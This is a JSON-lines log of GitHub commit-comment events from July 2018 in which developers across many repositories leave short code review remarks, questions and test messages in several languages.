{"id":"7981139826","type":"CommitCommentEvent","actor":{"login":"farfromrefug"},"repo":{"name":"NativeScript/nativescript-dev-webpack"},"payload":{"comment":{"id":29745212,"position":null,"line":null,"path":null,"commit_id":"a68778e7c576e0ec75b73beedfaa2fee08a97511","created_at":"2018-07-18T07:29:44Z","updated_at":"2018-07-18T07:29:44Z","author_association":"NONE","body":"@sis0k0 amazing but will the source map will be used In printed stacks in the console while running apps?"}},"created_at":"2018-07-18T07:29:44Z"}
{"id":"7981147840","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"vladimirblokhin/course"},"payload":{"comment":{"id":29745228,"position":5,"line":7,"path":"Lesson_1/triangle_area.rb","commit_id":"10aca25d7a40eb2fa9dc1866a6726585f8fe7adf","created_at":"2018-07-18T07:31:30Z","updated_at":"2018-07-18T07:31:30Z","author_association":"NONE","body":"Лучше сразу избегать однобуквенных названий переменных/методов. Они затрудняют чтение кода. Тут можно использовать например base, height и area."}},"created_at":"2018-07-18T07:31:30Z"}
{"id":"7981148307","type":"CommitCommentEvent","actor":{"login":"WickedShell"},"repo":{"name":"ArduPilot/mavlink"},"payload":{"comment":{"id":29745230,"position":15,"line":1394,"path":"message_definitions/v1.0/ardupilotmega.xml","commit_id":"535f2656a884013ba727d4a028b89f5ecf5086ef","created_at":"2018-07-18T07:31:36Z","updated_at":"2018-07-18T07:31:36Z","author_association":"NONE","body":"There is an enum that is close but it conflicts at the moment with our defines. I'm planning to PR/champion changing the enum to match the ardupilot header since no other project even uses the enum"}},"created_at":"2018-07-18T07:31:36Z"}
{"id":"7981148984","type":"CommitCommentEvent","actor":{"login":"mastef"},"repo":{"name":"elsassph/haxe-modular"},"payload":{"comment":{"id":29745231,"position":38,"line":159,"path":"doc/advanced.md","commit_id":"7c869f8feb602b9ff27c9599d44a9792a849aaec","created_at":"2018-07-18T07:31:45Z","updated_at":"2018-07-18T07:31:45Z","author_association":"NONE","body":"`graph.unlink` doesn't exist, should this be `graph.removeEdge` instead?"}},"created_at":"2018-07-18T07:31:45Z"}
{"id":"7981151341","type":"CommitCommentEvent","actor":{"login":"yskkin"},"repo":{"name":"ai/autoprefixer-rails"},"payload":{"comment":{"id":29745239,"position":4,"line":4,"path":"CHANGELOG.md","commit_id":"bd0497222ad16b32b25ea0b20e92f87e8fa4aec8","created_at":"2018-07-18T07:32:18Z","updated_at":"2018-07-18T07:32:18Z","author_association":"NONE","body":"Is this right?"}},"created_at":"2018-07-18T07:32:18Z"}
{"id":"7981153223","type":"CommitCommentEvent","actor":{"login":"JohnFLewis"},"repo":{"name":"miraheze/mw-config"},"payload":{"comment":{"id":29745241,"position":8,"line":119,"path":"LocalWiki.php","commit_id":"a3a7144e892489d0c12bc75c28a236a7541114f4","created_at":"2018-07-18T07:32:43Z","updated_at":"2018-07-18T07:32:43Z","author_association":"MEMBER","body":"/srv/mnt is bad. Please use the standard /mnt/ directory for mounts."}},"created_at":"2018-07-18T07:32:43Z"}
{"id":"7981155264","type":"CommitCommentEvent","actor":{"login":"JohnFLewis"},"repo":{"name":"miraheze/mw-config"},"payload":{"comment":{"id":29745246,"position":17,"line":5988,"path":"LocalSettings.php","commit_id":"3bc530ed51f9c863abda0eb41eaf6c68231049b7","created_at":"2018-07-18T07:33:09Z","updated_at":"2018-07-18T07:33:09Z","author_association":"MEMBER","body":"Please use /mnt/ for mounts."}},"created_at":"2018-07-18T07:33:09Z"}
{"id":"7981155491","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"vladimirblokhin/course"},"payload":{"comment":{"id":29745248,"position":5,"line":5,"path":"Lesson_1/ideal_weight.rb","commit_id":"447da277f2f2d80ec7f01ace2b4886e01cf114c0","created_at":"2018-07-18T07:33:13Z","updated_at":"2018-07-18T07:33:13Z","author_association":"NONE","body":"методы to_f/to_i уберают символ новой строки и chomp не нужен"}},"created_at":"2018-07-18T07:33:13Z"}
{"id":"7981155732","type":"CommitCommentEvent","actor":{"login":"ai"},"repo":{"name":"ai/autoprefixer-rails"},"payload":{"comment":{"id":29745250,"position":4,"line":4,"path":"CHANGELOG.md","commit_id":"bd0497222ad16b32b25ea0b20e92f87e8fa4aec8","created_at":"2018-07-18T07:33:16Z","updated_at":"2018-07-18T07:33:16Z","author_association":"OWNER","body":"Why do you should it is not right?"}},"created_at":"2018-07-18T07:33:16Z"}
{"id":"7981160325","type":"CommitCommentEvent","actor":{"login":"Naktibalda"},"repo":{"name":"Codeception/Stub"},"payload":{"comment":{"id":29745264,"position":null,"line":null,"path":null,"commit_id":"afa7fd28aff8953421214ae74e5a662e5d89e7bf","created_at":"2018-07-18T07:34:20Z","updated_at":"2018-07-18T07:34:20Z","author_association":"MEMBER","body":"It shouldn't do anything like that.\r\nDo you have the same version of phpunit and phpunit-mock-objects installed when testing Stub before and after this change?"}},"created_at":"2018-07-18T07:34:20Z"}
{"id":"7981165157","type":"CommitCommentEvent","actor":{"login":"misto"},"repo":{"name":"Cute-Test/cute-test.github.io"},"payload":{"comment":{"id":29745271,"position":25,"line":45,"path":"_layouts/guide.html","commit_id":"c4d3ba6c72cc79e0eb309d05db016e81cc062497","created_at":"2018-07-18T07:35:24Z","updated_at":"2018-07-18T07:35:24Z","author_association":"CONTRIBUTOR","body":"Could also just use position:sticky, no need for JavaScript here."}},"created_at":"2018-07-18T07:35:24Z"}
{"id":"7981168568","type":"CommitCommentEvent","actor":{"login":"AlexandraMV"},"repo":{"name":"AlexandraMV/AlexandraMV.github.io"},"payload":{"comment":{"id":29745285,"position":null,"line":null,"path":null,"commit_id":"6b4e86321c4d81f54870ae2eccef88a33d669ec6","created_at":"2018-07-18T07:36:09Z","updated_at":"2018-07-18T07:36:09Z","author_association":"OWNER","body":"h"}},"created_at":"2018-07-18T07:36:09Z"}
{"id":"7981174251","type":"CommitCommentEvent","actor":{"login":"n18023"},"repo":{"name":"n18023/programming-term2"},"payload":{"comment":{"id":29745296,"position":null,"line":null,"path":null,"commit_id":"d82dc95c856cbaa5b507ff94cd0b839c4b8c408f","created_at":"2018-07-18T07:37:28Z","updated_at":"2018-07-18T07:37:28Z","author_association":"OWNER","body":"金城先生\r\n\r\n御忙しい中失礼致します。そうだったんですか、すいません。m(_ _)m直しておきました。  平敷大賀\r\n\r\n2018年7月18日 13:09 kinjo-icolle <notifications@github.com>:\r\n\r\n> あっ。。。ソースはsrcディレクトリで大丈夫でした。\r\n> ちなみに、\r\n> src：ソース(source)の略\r\n> docs：文書(documents)の略\r\n> です。それぞれ分けて配置したく、そういうディレクトリ構成にしました。\r\n>\r\n> —\r\n> You are receiving this because you authored the thread.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/n18023/programming-term2/commit/d82dc95c856cbaa5b507ff94cd0b839c4b8c408f#commitcomment-29743775>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/Alf58-X6ejgBv3UrfVWUOTj-mgvOLuBpks5uHrUMgaJpZM4VT6h4>\r\n> .\r\n>\r\n"}},"created_at":"2018-07-18T07:37:28Z"}
{"id":"7981184583","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29745321,"position":8,"line":23,"path":"Lesson_2/5.rb","commit_id":"5635ff7c74c09880a6e8f2c1506705f0097accc8","created_at":"2018-07-18T07:39:52Z","updated_at":"2018-07-18T07:39:52Z","author_association":"NONE","body":"Это кстати единственная строка, которая тебе нужна. Она справляется и со сценарием, с первым месяцем\r\n```\r\n2.5.0 :005 > [].first(1).sum(2)\r\n => 2\r\n```"}},"created_at":"2018-07-18T07:39:52Z"}
{"id":"7981188203","type":"CommitCommentEvent","actor":{"login":"Hashmat2526"},"repo":{"name":"Hashmat2526/poems-test"},"payload":{"comment":{"id":29745327,"position":null,"line":null,"path":null,"commit_id":"d4a422735d28eb4e32af2ffbefe0dbc1b5ea9d0d","created_at":"2018-07-18T07:40:37Z","updated_at":"2018-07-18T07:40:37Z","author_association":"OWNER","body":"ok i like peach good"}},"created_at":"2018-07-18T07:40:37Z"}
{"id":"7981190195","type":"CommitCommentEvent","actor":{"login":"Amazigh-bedar"},"repo":{"name":"belkacem77/tuddar"},"payload":{"comment":{"id":29745335,"position":null,"line":null,"path":null,"commit_id":"20d02c230853ea646af9d94f1664b851651d43b0","created_at":"2018-07-18T07:41:04Z","updated_at":"2018-07-18T07:41:04Z","author_association":"CONTRIBUTOR","body":"Bedar, only with one /d/.\r\nBut you did well to change the name\r\nthank you"}},"created_at":"2018-07-18T07:41:04Z"}
{"id":"7981192008","type":"CommitCommentEvent","actor":{"login":"huwb"},"repo":{"name":"huwb/crest-oceanrender"},"payload":{"comment":{"id":29745338,"position":null,"line":null,"path":null,"commit_id":"3016cc06b87f1c6d0788d4837448bec571dfc0f5","created_at":"2018-07-18T07:41:29Z","updated_at":"2018-07-18T07:41:29Z","author_association":"OWNER","body":"@moosichu i tried our idea with rotating the kernel - this does a great job of combating the issues with the 5 tap laplacian! there are still minor artifacts that could be improved perhaps with a 9 tap kernel, but the overall rectilinear shape to the sim is gone - in the ripple scene the wavefronts look nice and round and the foam from the sim no longer forms a square patch. good stuff!!"}},"created_at":"2018-07-18T07:41:29Z"}
{"id":"7981195847","type":"CommitCommentEvent","actor":{"login":"Hashmat2526"},"repo":{"name":"Hashmat2526/poems-test"},"payload":{"comment":{"id":29745343,"position":null,"line":null,"path":null,"commit_id":"6e30acfae733138410ef6c39ba1e6b32e21a303b","created_at":"2018-07-18T07:42:16Z","updated_at":"2018-07-18T07:42:16Z","author_association":"OWNER","body":"please remove orange and write kinnu plus fruiter"}},"created_at":"2018-07-18T07:42:16Z"}
{"id":"7981196101","type":"CommitCommentEvent","actor":{"login":"bornabesic"},"repo":{"name":"bornabesic/cytokine-graph-db"},"payload":{"comment":{"id":29745348,"position":null,"line":null,"path":null,"commit_id":"3d3939a1b92cf208c32bdf789e1898f8065cbbf0","created_at":"2018-07-18T07:42:19Z","updated_at":"2018-07-18T07:42:19Z","author_association":"OWNER","body":"Design-wise that's a good option. If it is not too costly, I think that's a good way to do it."}},"created_at":"2018-07-18T07:42:19Z"}
{"id":"7981197657","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29745356,"position":7,"line":4,"path":"Lesson_2/1.rb","commit_id":"5635ff7c74c09880a6e8f2c1506705f0097accc8","created_at":"2018-07-18T07:42:39Z","updated_at":"2018-07-18T07:42:39Z","author_association":"NONE","body":"Я тебе писал в прошлом ревью варианты написания длинных хэшей. Такого там не было."}},"created_at":"2018-07-18T07:42:39Z"}
{"id":"7981198571","type":"CommitCommentEvent","actor":{"login":"Hashmat2526"},"repo":{"name":"Hashmat2526/poems-test"},"payload":{"comment":{"id":29745357,"position":1,"line":4,"path":"fruits.txt","commit_id":"6e30acfae733138410ef6c39ba1e6b32e21a303b","created_at":"2018-07-18T07:42:51Z","updated_at":"2018-07-18T07:42:51Z","author_association":"OWNER","body":"ok cool but only in summer"}},"created_at":"2018-07-18T07:42:51Z"}
{"id":"7981200963","type":"CommitCommentEvent","actor":{"login":"bowei-jbw"},"repo":{"name":"bowei-jbw/test1"},"payload":{"comment":{"id":29745366,"position":1,"line":1,"path":"hehe.js","commit_id":"8d8dd440f1594cc0aaaa3fdb31b3be4ea0779a2c","created_at":"2018-07-18T07:43:24Z","updated_at":"2018-07-18T07:43:24Z","author_association":"OWNER","body":"哈哈"}},"created_at":"2018-07-18T07:43:24Z"}
{"id":"7981202445","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29745371,"position":8,"line":5,"path":"Lesson_2/1.rb","commit_id":"5635ff7c74c09880a6e8f2c1506705f0097accc8","created_at":"2018-07-18T07:43:44Z","updated_at":"2018-07-18T07:43:44Z","author_association":"NONE","body":"Если тело блока можно уместить в одну строку, то вместо do end лучше использовать фигурные скобки\r\nmonth.each { |month, day| ... }"}},"created_at":"2018-07-18T07:43:44Z"}
{"id":"7981202574","type":"CommitCommentEvent","actor":{"login":"jasonm23"},"repo":{"name":"emacsfodder/emacs-theme-editor"},"payload":{"comment":{"id":29745372,"position":null,"line":null,"path":null,"commit_id":"06ceb5d0efffd8acc29aa2d49bb112077fc69de5","created_at":"2018-07-18T07:43:45Z","updated_at":"2018-07-18T07:43:45Z","author_association":"CONTRIBUTOR","body":"Theme authors would be expected to do a lot more with the theme before releasing on MELPA etc."}},"created_at":"2018-07-18T07:43:45Z"}
{"id":"7981203806","type":"CommitCommentEvent","actor":{"login":"scamille"},"repo":{"name":"simulationcraft/simc"},"payload":{"comment":{"id":29745373,"position":null,"line":null,"path":null,"commit_id":"b6e99e98436a33293b294803e548739cde47795b","created_at":"2018-07-18T07:44:02Z","updated_at":"2018-07-18T07:44:02Z","author_association":"MEMBER","body":"Could just add both active_actions and buff to its constructor initializer list. That way the get value initialized to 0 since it is a POD struct."}},"created_at":"2018-07-18T07:44:02Z"}
{"id":"7981203883","type":"CommitCommentEvent","actor":{"login":"squarenabla"},"repo":{"name":"rwth-i6/returnn"},"payload":{"comment":{"id":29745374,"position":306,"line":598,"path":"extern/official_tf_resnet/resnet_model.py","commit_id":"f3020254755b640c60d9a20f93443cc44e04fe2c","created_at":"2018-07-18T07:44:04Z","updated_at":"2018-07-18T07:44:04Z","author_association":"COLLABORATOR","body":"If you set conv_time_dim to False and block_sizes to the original ones, you'll have the official tf resnet."}},"created_at":"2018-07-18T07:44:04Z"}
{"id":"7981204497","type":"CommitCommentEvent","actor":{"login":"arnabmn"},"repo":{"name":"arnabmn/Krakow-Taxi-Claims"},"payload":{"comment":{"id":29745378,"position":null,"line":null,"path":null,"commit_id":"bd79fbf8c10ec199c8f1865ec9e75b98859fc937","created_at":"2018-07-18T07:44:11Z","updated_at":"2018-07-18T07:44:11Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4e3c4bad-7510-4386-9d19-8321591c4f07?env_id=ibm%3Ayp%3Aeu-gb \"Global-Weather\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/ec0e2f49-7e5c-4e10-9329-585efae5cf5b?env_id=ibm%3Ayp%3Aeu-gb \"Krakow-Taxi-Claims\") deployed [Krakow-Taxi-Claims](https://github.com/arnabmn/Krakow-Taxi-Claims/releases/tag/deploy-ibm-yp-eu-gb-CF1_ARNABHAT-QAS-20180718-074410 \"deploy-ibm-yp-eu-gb-CF1_ARNABHAT-QAS-20180718-074410\") to [QAS](https://console.bluemix.net/apps/29d4b089-38d1-4daf-aed3-162fef36a8be?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:CF1_ARNABHAT:QAS\"), including this commit"}},"created_at":"2018-07-18T07:44:11Z"}
{"id":"7981209414","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29745390,"position":3,"line":2,"path":"Lesson_2/3.rb","commit_id":"5635ff7c74c09880a6e8f2c1506705f0097accc8","created_at":"2018-07-18T07:45:16Z","updated_at":"2018-07-18T07:45:16Z","author_association":"NONE","body":"Не забудь удалить последнюю единицу из массива тогда. Что-бы последовательность Фибоначчи у нас не начиналась с трех единиц"}},"created_at":"2018-07-18T07:45:16Z"}
{"id":"7981210066","type":"CommitCommentEvent","actor":{"login":"moritzfelipe"},"repo":{"name":"dacadeorg/test-assignment-01-RouvenFox"},"payload":{"comment":{"id":29745391,"position":null,"line":null,"path":null,"commit_id":"145f878242dbde1955f75d9acd0f149c5317463a","created_at":"2018-07-18T07:45:26Z","updated_at":"2018-07-18T07:45:26Z","author_association":"CONTRIBUTOR","body":"Relevance: 6/6 Points. Good use case. A public Blockchain can offer transparency because it is public and immutable.\r\n\r\nOriginality: 3/3 Points. This is a very unique idea, I have never heard of something like it. Good job.\r\n\r\nQuality: 1/1 Point. Nicely written, thank you."}},"created_at":"2018-07-18T07:45:26Z"}
{"id":"7981210967","type":"CommitCommentEvent","actor":{"login":"inpercima"},"repo":{"name":"dvcs/gitignore"},"payload":{"comment":{"id":29745392,"position":7,"line":10,"path":"templates/Maven.gitignore","commit_id":"2118b1a3ca5c59a25903312499102a943ea81f63","created_at":"2018-07-18T07:45:38Z","updated_at":"2018-07-18T07:45:38Z","author_association":"CONTRIBUTOR","body":"Hi @joeblau, after some days I understand the new behavior. Your PR https://github.com/dvcs/gitignore/pull/123/files should be reverted b/c of https://github.com/takari/maven-wrapper#usage-without-binary-jar.\r\nSo no *.jar is necessary, maven organizes itself. sorry for your effort."}},"created_at":"2018-07-18T07:45:38Z"}
{"id":"7981211432","type":"CommitCommentEvent","actor":{"login":"cr1901"},"repo":{"name":"cr1901/symbiflow-arch-defs"},"payload":{"comment":{"id":29745394,"position":33,"line":33,"path":"xc20xx/primitives/lut/xc20xx_lut.sim.v","commit_id":"5221981cd9f9f78de03e462b9eb4e6498019f372","created_at":"2018-07-18T07:45:45Z","updated_at":"2018-07-18T07:45:45Z","author_association":"OWNER","body":"No, it's set by a configuration bit (hence the `generate`)."}},"created_at":"2018-07-18T07:45:45Z"}
{"id":"7981216186","type":"CommitCommentEvent","actor":{"login":"squarenabla"},"repo":{"name":"rwth-i6/returnn"},"payload":{"comment":{"id":29745400,"position":24,"line":4772,"path":"TFNetworkLayer.py","commit_id":"efcf8a151633a515401d24d0c1455119ca5d34ed","created_at":"2018-07-18T07:46:49Z","updated_at":"2018-07-18T07:46:49Z","author_association":"COLLABORATOR","body":"Sure, that's for the default fast version. I'll fix this soon"}},"created_at":"2018-07-18T07:46:49Z"}
{"id":"7981217461","type":"CommitCommentEvent","actor":{"login":"MrLar"},"repo":{"name":"Mantaro/MantaroBot"},"payload":{"comment":{"id":29745407,"position":null,"line":null,"path":null,"commit_id":"43ae6fa926a38d00aa072d95b388b2d7dd5309d4","created_at":"2018-07-18T07:47:06Z","updated_at":"2018-07-18T07:47:06Z","author_association":"MEMBER","body":"This is normal"}},"created_at":"2018-07-18T07:47:06Z"}
{"id":"7981218319","type":"CommitCommentEvent","actor":{"login":"Dansteve"},"repo":{"name":"elevowofficial/Super-Duper-Crypto"},"payload":{"comment":{"id":29745409,"position":null,"line":null,"path":null,"commit_id":"38e217f339038d6eea1d6c3f000c8d0ec6d34ec1","created_at":"2018-07-18T07:47:18Z","updated_at":"2018-07-18T07:47:18Z","author_association":"COLLABORATOR","body":"Hi Elevo,\r\nMy fiverr account was disable by fiverr for some reason.\r\nbut i have created another account \"Dansteveade1\".\r\nPlease message me when you can."}},"created_at":"2018-07-18T07:47:18Z"}
{"id":"7981219764","type":"CommitCommentEvent","actor":{"login":"ASliceOfHammy"},"repo":{"name":"Mantaro/MantaroBot"},"payload":{"comment":{"id":29745412,"position":null,"line":null,"path":null,"commit_id":"43ae6fa926a38d00aa072d95b388b2d7dd5309d4","created_at":"2018-07-18T07:47:38Z","updated_at":"2018-07-18T07:47:38Z","author_association":"NONE","body":"mantaro hub starter pack 2.0\r\n"}},"created_at":"2018-07-18T07:47:38Z"}
{"id":"7981226788","type":"CommitCommentEvent","actor":{"login":"perfectsxh"},"repo":{"name":"nikcheerla/mitosis-detection"},"payload":{"comment":{"id":29745419,"position":114,"line":97,"path":"train_icpr_bootstrap.py","commit_id":"a5e41921d3108077fcff4714335e98e8397837ce","created_at":"2018-07-18T07:49:13Z","updated_at":"2018-07-18T07:49:13Z","author_association":"NONE","body":"hi, niki~ Herein, the self.predmap is used for the construction of error queue, but it seems have no change after initialized with zeros(float). what's your purpose here?\r\nBesides, I didn't found any patch generation process. did u do the pixel training on the original whole images?\r\nI'd appreciate a lot if u can help me with above issues!"}},"created_at":"2018-07-18T07:49:13Z"}
{"id":"7981235391","type":"CommitCommentEvent","actor":{"login":"lil-isa"},"repo":{"name":"dacadeorg/test-assignment-01-RouvenFox"},"payload":{"comment":{"id":29745434,"position":4,"line":4,"path":"submission1.md","commit_id":"145f878242dbde1955f75d9acd0f149c5317463a","created_at":"2018-07-18T07:51:04Z","updated_at":"2018-07-18T07:51:04Z","author_association":"NONE","body":"I really like this idea and I think its a great usecase for blockchain, because there is no transparency In what happens with data. Its our privacy and we even pay for all of the surveillance tech. Also an idea: Some sensitive data could even just be accessed with a warrant, a private key from a judge for example."}},"created_at":"2018-07-18T07:51:04Z"}
{"id":"7981237407","type":"CommitCommentEvent","actor":{"login":"lil-isa"},"repo":{"name":"dacadeorg/test-assignment-01-RouvenFox"},"payload":{"comment":{"id":29745439,"position":3,"line":3,"path":"submission1.md","commit_id":"145f878242dbde1955f75d9acd0f149c5317463a","created_at":"2018-07-18T07:51:30Z","updated_at":"2018-07-18T07:51:30Z","author_association":"NONE","body":"I really like this idea and I think its a great usecase for blockchain, because there is no transparency In what happens with data. Its our privacy and we even pay for all of the surveillance tech. Also an idea: Some sensitive data could even just be accessed with a warrant, a private key from a judge for example."}},"created_at":"2018-07-18T07:51:30Z"}
{"id":"7981237556","type":"CommitCommentEvent","actor":{"login":"aleksndrch"},"repo":{"name":"aleksndrch/PyForFan"},"payload":{"comment":{"id":29745440,"position":1,"line":1,"path":"RuCityWikiPopulationMaining/ReadMe.txt","commit_id":"4f8de34254e379679ce27896b0ba5748e89ff402","created_at":"2018-07-18T07:51:32Z","updated_at":"2018-07-18T07:51:32Z","author_association":"OWNER","body":"апапапап"}},"created_at":"2018-07-18T07:51:32Z"}
{"id":"7981244818","type":"CommitCommentEvent","actor":{"login":"Haydencleary"},"repo":{"name":"highcharts/rounded-corners"},"payload":{"comment":{"id":29745448,"position":null,"line":null,"path":null,"commit_id":"b1b808a9551c719b554981b95eb049fb2b4736cd","created_at":"2018-07-18T07:53:09Z","updated_at":"2018-07-18T07:53:09Z","author_association":"NONE","body":"Was this commit pushed to npm? When trying to install from npm I get this error:\r\n![screen shot 2018-07-18 at 09 51 02](https://user-images.githubusercontent.com/5160414/42867560-426f445c-8a70-11e8-9a7c-ad5564d9d54c.jpg)\r\nThanks!\r\n"}},"created_at":"2018-07-18T07:53:09Z"}
{"id":"7981246213","type":"CommitCommentEvent","actor":{"login":"dyusuf"},"repo":{"name":"bornabesic/cytokine-graph-db"},"payload":{"comment":{"id":29745455,"position":null,"line":null,"path":null,"commit_id":"3d3939a1b92cf208c32bdf789e1898f8065cbbf0","created_at":"2018-07-18T07:53:27Z","updated_at":"2018-07-18T07:53:27Z","author_association":"COLLABORATOR","body":"yes, cost. let's test it. we may find a better solution when becoming more expert in neo4j. "}},"created_at":"2018-07-18T07:53:27Z"}
{"id":"7981247807","type":"CommitCommentEvent","actor":{"login":"moritzfelipe"},"repo":{"name":"dacadeorg/test-assignment-01-RouvenFox"},"payload":{"comment":{"id":29745458,"position":3,"line":3,"path":"submission1.md","commit_id":"145f878242dbde1955f75d9acd0f149c5317463a","created_at":"2018-07-18T07:53:48Z","updated_at":"2018-07-18T07:53:48Z","author_association":"CONTRIBUTOR","body":"Great feedback isa, you will get rewarded 2$ in AE Token. Check your mailbox."}},"created_at":"2018-07-18T07:53:48Z"}
{"id":"7981248058","type":"CommitCommentEvent","actor":{"login":"Jamesnelson117"},"repo":{"name":"dvsa/front-end"},"payload":{"comment":{"id":29745459,"position":6,"line":78,"path":"src/assets/scss/modules/dvsa-results-entry/_dvsa-results-entry.scss","commit_id":"d23ec0a03258745968e949034e8614d0b16d7b15","created_at":"2018-07-18T07:53:52Z","updated_at":"2018-07-18T07:53:52Z","author_association":"COLLABORATOR","body":"Why are you just commenting these out? Can we not just remove if not needed? "}},"created_at":"2018-07-18T07:53:52Z"}
{"id":"7981248622","type":"CommitCommentEvent","actor":{"login":"AndrewJCallow"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29745462,"position":73,"line":33,"path":"test/tests.js","commit_id":"b6f3d1d0858a9a509b0a69b3f9a399e4a8534c6d","created_at":"2018-07-18T07:53:59Z","updated_at":"2018-07-18T07:53:59Z","author_association":"OWNER","body":"I think I've finally done it!!! Thank you for your help."}},"created_at":"2018-07-18T07:53:59Z"}
{"id":"7981250817","type":"CommitCommentEvent","actor":{"login":"yskkin"},"repo":{"name":"ai/autoprefixer-rails"},"payload":{"comment":{"id":29745468,"position":4,"line":4,"path":"CHANGELOG.md","commit_id":"bd0497222ad16b32b25ea0b20e92f87e8fa4aec8","created_at":"2018-07-18T07:54:26Z","updated_at":"2018-07-18T07:54:26Z","author_association":"NONE","body":"I only searched https://github.com/ai/autoprefixer-rails/compare/8.6.5...9.0.0 for relevant commit and could not find it.\r\nNow I find https://github.com/postcss/autoprefixer/commit/b41f52a939144f0f2e230801986bc7142f163e03.\r\nSorry for noise."}},"created_at":"2018-07-18T07:54:26Z"}
{"id":"7981250960","type":"CommitCommentEvent","actor":{"login":"stiwwelll"},"repo":{"name":"betterplace/streambot"},"payload":{"comment":{"id":29745469,"position":13,"line":92,"path":"src/App.js","commit_id":"74edb29cae2f95934b39bee1020cdf2b497ccde5","created_at":"2018-07-18T07:54:28Z","updated_at":"2018-07-18T07:54:28Z","author_association":"CONTRIBUTOR","body":"Nifty. 🥇 "}},"created_at":"2018-07-18T07:54:28Z"}
{"id":"7981255104","type":"CommitCommentEvent","actor":{"login":"tobim"},"repo":{"name":"vast-io/vast"},"payload":{"comment":{"id":29745481,"position":5,"line":88,"path":"libvast/test/mmapbuf.cpp","commit_id":"3b159c5beaeaa08695ce17a288e5d82171348ef0","created_at":"2018-07-18T07:55:23Z","updated_at":"2018-07-18T07:55:23Z","author_association":"MEMBER","body":"@Neverlord I fully agree, it slipped my mind this time, i'll make sure to add closing comments in the future."}},"created_at":"2018-07-18T07:55:23Z"}
{"id":"7981257287","type":"CommitCommentEvent","actor":{"login":"sagotch"},"repo":{"name":"geneweb/geneweb"},"payload":{"comment":{"id":29745489,"position":5,"line":101,"path":"src/birthday.ml","commit_id":"96f6a8031e1c9ad95ee67970bbec15c87a216ad6","created_at":"2018-07-18T07:55:52Z","updated_at":"2018-07-18T07:55:52Z","author_association":"NONE","body":"`if Array.for_all ((=) []) tab then`"}},"created_at":"2018-07-18T07:55:52Z"}
{"id":"7981263739","type":"CommitCommentEvent","actor":{"login":"ai"},"repo":{"name":"ai/autoprefixer-rails"},"payload":{"comment":{"id":29745494,"position":4,"line":4,"path":"CHANGELOG.md","commit_id":"bd0497222ad16b32b25ea0b20e92f87e8fa4aec8","created_at":"2018-07-18T07:57:11Z","updated_at":"2018-07-18T07:57:11Z","author_association":"OWNER","body":"https://github.com/postcss/autoprefixer/blob/master/package.json#L137\r\n\r\nBabel compiles Autoprefixer sources only for Node 6+."}},"created_at":"2018-07-18T07:57:11Z"}
{"id":"7981264811","type":"CommitCommentEvent","actor":{"login":"wangpeng0523"},"repo":{"name":"wangpeng0523/personDemo"},"payload":{"comment":{"id":29745496,"position":179,"line":895,"path":".idea/workspace.xml","commit_id":"0986046669171b0b127058b50081b2b5076bdfa2","created_at":"2018-07-18T07:57:25Z","updated_at":"2018-07-18T07:57:25Z","author_association":"OWNER","body":"workspace.xml文件\r\n"}},"created_at":"2018-07-18T07:57:25Z"}
{"id":"7981266703","type":"CommitCommentEvent","actor":{"login":"ai"},"repo":{"name":"ai/autoprefixer-rails"},"payload":{"comment":{"id":29745504,"position":4,"line":4,"path":"CHANGELOG.md","commit_id":"bd0497222ad16b32b25ea0b20e92f87e8fa4aec8","created_at":"2018-07-18T07:57:49Z","updated_at":"2018-07-18T07:57:49Z","author_association":"OWNER","body":"So gem will not work if you have Node.js 4 and use Node as ExecJS runtime."}},"created_at":"2018-07-18T07:57:49Z"}
{"id":"7981267603","type":"CommitCommentEvent","actor":{"login":"swsyxgs"},"repo":{"name":"sws-algorithm-competition/GNU-virus-scan_sws-virus-scan"},"payload":{"comment":{"id":29745507,"position":null,"line":null,"path":null,"commit_id":"e39173560922f60efa12b73c5f04469fc915dadd","created_at":"2018-07-18T07:58:00Z","updated_at":"2018-07-18T07:58:00Z","author_association":"NONE","body":"great"}},"created_at":"2018-07-18T07:58:00Z"}
{"id":"7981268241","type":"CommitCommentEvent","actor":{"login":"Euseong"},"repo":{"name":"Euseong/R-project"},"payload":{"comment":{"id":29745509,"position":4,"line":61,"path":"rent_analysis.R","commit_id":"2f06587cac37c435bb2f8be9307858e3a6d491cf","created_at":"2018-07-18T07:58:09Z","updated_at":"2018-07-18T07:58:09Z","author_association":"OWNER","body":"pairs.panels 함수로 추가 분석"}},"created_at":"2018-07-18T07:58:09Z"}
{"id":"7981268943","type":"CommitCommentEvent","actor":{"login":"luluhongxu"},"repo":{"name":"luluhongxu/hongxu-master"},"payload":{"comment":{"id":29745511,"position":null,"line":null,"path":null,"commit_id":"f4f30b77f39d7382f0594f3a28d55e474ac0af2e","created_at":"2018-07-18T07:58:17Z","updated_at":"2018-07-18T07:58:17Z","author_association":"OWNER","body":"My comments from curl. "}},"created_at":"2018-07-18T07:58:17Z"}
{"id":"7981269200","type":"CommitCommentEvent","actor":{"login":"Euseong"},"repo":{"name":"Euseong/R-project"},"payload":{"comment":{"id":29745512,"position":7,"line":64,"path":"rent_analysis.R","commit_id":"2f06587cac37c435bb2f8be9307858e3a6d491cf","created_at":"2018-07-18T07:58:20Z","updated_at":"2018-07-18T07:58:20Z","author_association":"OWNER","body":"pairs.panels 함수로 추가 분석"}},"created_at":"2018-07-18T07:58:20Z"}
